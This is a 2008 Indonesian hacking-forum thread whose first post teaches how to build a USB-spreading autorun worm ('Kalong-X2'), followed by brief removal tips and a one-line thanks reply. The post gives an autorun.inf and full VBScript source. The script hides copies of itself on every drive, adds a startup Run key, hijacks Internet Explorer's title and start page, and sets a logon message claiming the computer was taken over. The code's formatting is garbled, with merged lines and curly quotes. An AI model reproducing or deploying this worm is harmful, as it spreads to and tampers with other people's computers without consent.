vman_messengers
Jubir
 Jumlah posting : 129
Age : 35
Lokasi : INDONESIA
Job/hobbies : ..::Menjelajah dunia maya::..
Humor : ulah selingkuh nya..^_^
Ids Mig33 : xtc1
Registration date : 12.10.08
 | | Subyek: Membuat dan Menghapus Virus Autorun tanpa Antivirus Mon Nov 03, 2008 5:40 pm | |
| cara membuat virus autorun;
1. script coding pertama
[autorun]shellexecute=wscript.exe k4l0n6.sys.vbs
simpan coding tersebut dengan nama dan ekstensi file “autorun.inf” (tanpa tanda petik)
2. script coding kedua‘Kalong-X2‘Varian dari Kalong.VBSon error resume next
‘Dim kata-kata berikutdim rekur,syspath,windowpath,desades,longka,mf,isi,tf, kalong,nt,check,sd
’siapkan isi autorun isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.sys.vbs”set longka = createobject(”Scripting.FileSystemObject”)set mf = longka.getfile(Wscript.ScriptFullname)dim text,sizesize = mf.sizecheck = mf.drive.drivetypeset text = mf.openastextstream(1,-2)do while not text.atendofstreamrekur = rekur & text.readlinerekur = rekur & vbcrlfloopdo
‘buat file induk
Set windowpath = longka.getspecialfolder(0)Set syspath = longka.getspecialfolder(1)set tf = longka.getfile(syspath & “\recycle.vbs”)tf.attributes = 32set tf = longka.createtextfile(syspath & “\recycle.vbs”,2,true)tf.write rekurtf.closeset tf = longka.getfile(syspath & “\recycle.vbs”)tf.attributes = 39
’sebar ke removable disc ditambahkan dengan Autorun.inf
for each desades in longka.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> “A:” then
set tf=longka.getfile(desades.path &”\k4l0n6.sys.vbs”)tf.attributes =32set tf=longka.createtextfile(desades.path &”\k4l0n6.sys.vbs”,2,true)tf.write rekurtf.closeset tf=longka.getfile(desades.path &”\k4l0n6.sys.vbs”)tf.attributes = 39
set tf =longka.getfile(desades.path &”\autorun.inf”)tf.attributes = 32set tf=longka.createtextfile(desades.path &”\autorun.inf”,2,true)tf.write isitf.closeset tf = longka.getfile(desades.path &”\autorun.inf”)tf.attributes=39end ifnext
‘Manipulasi Registry
set kalong = createobject(”WScript.Shell”)
‘Ubah IE Titlekalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: X2 ATTACK ::”
‘Ubah tulisan pertama pada text box menu RUNkalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Explorer\RunMRU\a”, “KALONG-X2/1?kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Explorer\RunMRU\MRUList”, “a”
‘Buat pesan saat Windows Startupkalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Winlogon\LegalNoticeCaption”, “KALONG-X2?kalong.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Winlogon\LegalNoticeText”, “Komputer Anda Diambil Alih”
‘Aktifkan saat Windows Startup
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\Ageia”, syspath & “\recycle.vbs”
‘Ubah Default Start Page Internet Explorerkalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page”, “http://www.vaksin.com”
‘Bonus
if check <> 1 thenWscript.sleep 200000end ifloop while check <> 1set sd = createobject(”Wscript.shell”)sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
simpan coding tersebut dengan nama dan ekstensi file “k4l0n6.sys.vbs” (tanpa tanda petik)
secara otomatis virus tersebut akan menyebar melalui flashdisk dan menginfeksi komputer yang kita gunakan. Untuk mengetahui komputer terkena virus autorun dapat menggunakan software iKnowPS sehingga akan terlihat frekuensi tampilan kerja komputer yang terlihat sangat sibuk.
Adapun cara menanggulangi virus tersebut yaitu dengan cara
- tekan menu Tools > Folder Options… > View > unchek Hide Protected operating system files (Recommended) > yes > OK
- sehingga secara otomatis akan terlihat tampilan file virus yang terhidden tersebut
- langkah selanjutnya yaitu dengan cara membuka dan mempelajari script coding file virus tersebut. Dan mempelajari bagian-bagian mana saja yang settingannya dirubah, terutama pada register editor (menu run > ketik regedit > OK)
- setelah itu, file tersebut dihapus/di delete dari komputer
semoga ada manfa'atnya...  | |
|
c3p0t.g4ul
camat
Jumlah posting : 71
Age : 38
Lokasi : tasikmalaya
Job/hobbies : ngalawak
Humor : Pamajikan wing ngandung euy........
Ids Mig33 : c3p0t.g4ul
Registration date : 11.10.08
| | Subyek: Re: Membuat dan Menghapus Virus Autorun tanpa Antivirus Mon Nov 03, 2008 6:07 pm | |
| Thank's buat infonya  | |
|
s_e_m_u_d
Moderators
Jumlah posting : 300
Age : 38
Lokasi : Jakarta - Batam
Job/hobbies : Hibaru
Humor : keep da struggle
Ids Mig33 : s_e_m_u_d
Registration date : 02.11.08
| |
Sponsored content
| | Subyek: Re: Membuat dan Menghapus Virus Autorun tanpa Antivirus | |
| |
|
